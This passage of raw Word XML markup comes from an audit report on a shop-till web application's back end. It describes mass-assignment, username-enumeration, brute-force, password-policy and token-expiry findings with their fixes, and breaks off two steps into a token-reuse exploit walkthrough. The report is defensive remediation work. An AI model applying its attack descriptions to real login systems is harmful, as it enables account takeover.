          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> appeared in four more controllers, each exposing its own business key.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A widespread misunderstanding of what validate() does. It is a genuinely confusing API: it looks like a filter and behaves like an assertion.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">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Two independent layers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="312" w:hanging="312"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Model.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Business keys removed from $fillable entirely and set once, at creation, by direct attribute assignment which is not subject to mass-assignment protection. If a controller ever regresses to update($request-&gt;all()) , the key still cannot move.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="31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Controller.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every write assigns $validated only. The four unvalidated controllers gained rules.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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credit_balance is declared prohibited on update with a message pointing at the ledger endpoints. An explicit 422 beats silently dropping the field  a client that believes it wrote a balance and did not is its own class of bug.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">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Also fixed here, because it was masking this entire class of defect:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> every try/catch wrapping a validate() call caught \Exception , and ValidationException extends Exception so validation failures were swallowed and returned as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500 "Failed to update customer"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Eleven catch clauses now re-throw so the handler renders a proper 422.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both writes → 422, values unchanged, with an actionable error message.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">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V-05 · Authentication weaknesses (four sub-findings)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="191" w:before="280" w:line="259"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A07:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">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V-05a: Username enumeration.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthController.php:33 returned 404 "The provided username does not exist." versus :40 401 "The provided password is incorrect." An attacker could confirm which usernames exist cheaply, without guessing a password and only then spray. Usernames here are predictable staff names, so that first step was close to free. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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CWE-204.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">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Fixed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> One response for both, 401 "The username or password is incorrect." A bcrypt comparison against a dummy hash runs when the user does not exist, so the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">response time</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not leak what the message no longer does without it, a missing user returns in microseconds while a real one costs a full cost-12 bcrypt round. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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CWE-208.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">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V-05b: No brute-force protection.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> No limiter on /login ; the only restriction was the global 60/minute by IP. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">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Confirmed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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20 consecutive wrong passwords, all processed, none throttled</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and before V-11 — no log entry either. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-307.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">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Fixed with two limits applied together: 5/minute per </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username+IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (stops hammering one account) and 20/minute per </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(stops credential stuffing, where each attempt uses a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">different</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> username and so would never trip a per-username limit). Per-minute limiting rather than a hard lockout, deliberately: a lockout on a shop till is itself a denial of service — an attacker knowing a cashier's username could lock them out mid-shift.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">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V-05c: Weak password policy.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'required|string|min:6' . Confirmed: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">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"123456" was accepted</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The most commonly used password in the world. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">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CWE-521.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">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Fixed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 characters, mixed case, digit, symbol, plus uncompromised(). a Have I Been Pwned check using k-anonymity, so only the first five characters of the SHA-1 hash leave the server and the password never does. If that service is unreachable the rule passes rather than locking staff out of account creation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">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V-05d: No self-service password change.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The only path was the admin-only update , which did </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> require the current password. So any compromise of an admin token was a permanent takeover of every account, and a cashier who thought their password had been seen could do nothing. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">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CWE-620.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">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Fixed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST /change-password requiring the current password so a stolen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot be used to change the password and lock the real owner out and revoking every session afterwards.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">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V-06 · Tokens never expired and survived termination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="166" w:before="280" w:line="265"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A07:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-613</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CWE-672</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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">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Evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> config/sanctum.php:49 'expiration' =&gt; null . Tokens issued with default ['*'] abilities, prior tokens never revoked, logout deleting only currentAccessToken() , and is_active checked at login and never again.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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Exploit, executed end to end:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="430" w:hanging="430"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">employee logs in            → token issued</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="430" w:hanging="430"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin sets is_active=false  → fresh logins refused (403)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
